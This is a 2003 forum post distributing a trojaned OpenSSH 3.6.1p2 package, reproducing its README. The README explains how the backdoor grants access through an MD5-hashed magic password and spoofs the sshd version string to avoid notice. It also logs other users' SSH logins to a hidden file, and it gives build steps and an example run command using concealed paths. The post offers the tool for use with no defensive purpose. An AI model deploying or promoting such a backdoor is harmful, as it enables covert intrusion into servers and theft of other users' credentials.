wicked
Nov 18 2003, 09:08 PM
0x333openssh-3.6.1p2.tar.gz
Submits the time: 2003-07-16
Submits the user:Nic0x333
Tool classification: Back door procedure
Movement platform: Unix/Linux
Tool size: 880,209 Bytes
Document MD5: 4083c898a30313d64a64ffaff816956b
Tool origin: 0x333 Outsiders Security Labs
Openssh backdoor that use a file config, with key MD5
For the password and a fake string for version of sshd daemon, nothing of default, auto sniff other users, for other information read the README. by nsn, djoser.
more info:
| CODE |
-----------------------------------------------------------------------------------------------------------------------------
openssh-3.6.1p2 backdoor by nsn.
credits djoser.
-----------------------------------------------------------------------------------------------------------------------------
This backdoor works in two modes, like a trojan and like a standard DAEMON.
in trojan mode you have to specify two options (if you don't specify these, works in NO TROJAN MODE):
-n file path Configuration file
-s file path Sniff output log file
format of configuration file have to be this:
hashMD5 (magic password)
openSSH fake version
e.g:
bda6faa04180e97ef40aaeab44a1fee1
SSH-1.99-OpenSSH_3.5p1
first line is a hash of key "nsn" in MD5, second line a fake version of DAEMON.
in this package will be incluse 0x333MD5hash-linux.c that generate password for you.
if you don't specify a version, by default is getted version openssh-3.6.2p1.
In sniff file will be logged all access except access with magic password, this can be nice, if you replace true sshd,
with this trojan and log all access of others users, and more you can fake version of old sshd, so nothing should be
changed.
-----------------------------------------------------------------------------------------------------------------------------
compiling:
-----------------------------------------------------------------------------------------------------------------------------
cd src
./configure
make
make install
-----------------------------------------------------------------------------------------------------------------------------
when run daemon:
./sshd -p port -n conf -s sniff file
e.g:
./sshd -p 25000 -n /usr/src/.info/.cnf -s /usr/src/.info/.sh.pw
sshd doesn't use defaults path, for -n and -s, is a your job touch it and generate it correctly.
-----------------------------------------------------------------------------------------------------------------------------
www.0x333.org
outsiders.
-----------------------------------------------------------------------------------------------------------------------------
|
Enjoy!
Wkd.
Note: you will need Uharc to Decompress this.
.../
